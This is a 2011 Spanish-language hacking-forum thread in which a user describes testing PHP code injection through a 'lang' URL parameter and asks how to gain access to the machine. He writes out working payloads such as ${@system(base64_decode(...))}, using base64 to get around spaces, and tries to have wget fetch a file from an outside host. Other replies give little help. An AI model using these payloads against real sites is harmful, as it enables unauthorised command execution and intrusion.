elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  PHP injection		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: PHP injection  (Leído 4,052 veces)
chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
PHP injection
« en: 10 Junio 2011, 01:41 am »
Buenas.

Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación:


1.-http://localhost/?lang=${@phpinfo()}   FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo).

2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio).
Así que pensé en utilizar base64.

3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA

Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir.

Thanks.  ;D
« Última modificación: 10 Junio 2011, 01:53 am por chusrubi2 » En línea
chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: PHP injection
« Respuesta #1 en: 10 Junio 2011, 16:06 pm »
Bueno si he sido capaz de utilizar el system(ls -l), obviamente es linux. Particularmente:
System   Linux PERSEO 2.6.18-53.el5 #1 SMP Mon Nov 12 02:22:48 EST 2007 i686

Pero no estoy muy familiarizado con la consola de linux (solo lo básico, instalar programas etc).

¿Qué comandos, y de qué manera debería ponerlos en la url para acceder?

Gracias.

Edito: he estado investigando un poco y he empezado a usar el wget como prueba. Lo que he hecho es simplemente escribir system(wget) y sí me sale que tengo que poner la url despues del wget, pero por el problema de los espacios lo he hecho en base64.
Lo que he hecho ha sido: system(base64_decode(XXXCODEENBASE64))
XXXCODEENBASE64=wget xxx.com/phpinfo.txt
Pero no funciona, se tira todo el rato cargando y no hace nada...
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: PHP injection
« Respuesta #2 en: 10 Junio 2011, 18:38 pm »
Pues no se que quieres hacer, pero... el wget lo puedes hacer desde la misma consola de tu PC
En línea
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
chusrubi2

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re: PHP injection
« Respuesta #3 en: 10 Junio 2011, 19:51 pm »
Quiero subir un archivo (en el caso en el que no sea mi pc).
Nada intento el wget host.com/file.txt (en base64) y nada la web no carga...
¿Qué otra cosa puedo hacer?
« Última modificación: 10 Junio 2011, 20:47 pm por chusrubi2 » En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sql injection
Nivel Web 		TheAnswer 1 3,546 Último mensaje 11 Octubre 2004, 08:07 am
por Jec
SQL Injection
Nivel Web 		Adept 4 4,350 Último mensaje 7 Diciembre 2004, 22:56 pm
por PaK0
una de sql-injection!!
Nivel Web 		krispin 2 4,136 Último mensaje 29 Enero 2005, 05:22 am
por krispin
CAST EXEC en sql injection(Automated Sql Injection)
Nivel Web 		EvilGoblin 2 5,009 Último mensaje 11 Julio 2010, 22:25 pm
por EvilGoblin
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines